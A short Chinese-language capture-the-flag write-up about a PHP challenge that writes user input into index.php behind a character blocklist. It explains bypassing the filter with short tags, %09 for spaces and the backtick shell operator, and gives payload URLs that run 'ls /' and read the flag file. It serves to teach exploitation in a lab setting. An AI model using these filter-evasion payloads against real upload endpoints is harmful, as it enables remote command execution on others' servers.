补充知识点:
先来看第一部分代码,
当action=pwd时则给出路径;当action=upload时,可以上传参数data
$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
mkdir($dir);
}
switch($_GET["action"] ?? "") {
case 'pwd':
echo $dir;
break;
case 'upload':
$data = $_GET["data"] ?? "";
waf($data);
file_put_contents("$dir" . "index.php", $data);
}
这里是判断是否有以下字符,如有则die
function check($input){
if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
// if(preg_match("/'| |_|=|php/",$input)){
die('hacker!!!');
}else{
return $input;
}
}
function waf($input){
if(is_array($input)){
foreach($input as $key=>$output){
$input[$key] = waf($output);
}
}else{
$input = check($input);
}
}
我们若想执行php命令就需使用<?php,但上面禁用了,这里就需要使用php的短标签<? ?>,由于空格也被禁用了,可以使用php中的%09来代替.
PHP 支持一个执行运算符:反引号(``)。注意这不是单引号!PHP 将尝试将反引号中的内容作为 shell 命令来执行,并将其输出信息返回(即,可以赋给一个变量而不是简单地丢弃到标准输出)。使用反引号运算符"`"的效果与函数shell_exec() 相同。
注意:
关闭了 shell_exec() 时反引号运算符是无效的。
与其它某些语言不同,反引号不能在双引号字符串中使用。
查看根目录的所有文件,执行命令后再访问pwd给出的路径即可查看
?action=upload&data=<?echo%09`ls%09/`?>
查看flllllll1112222222lag文件
?action=upload&data=<?echo%09`cat%09/flllllll1112222222lag`?>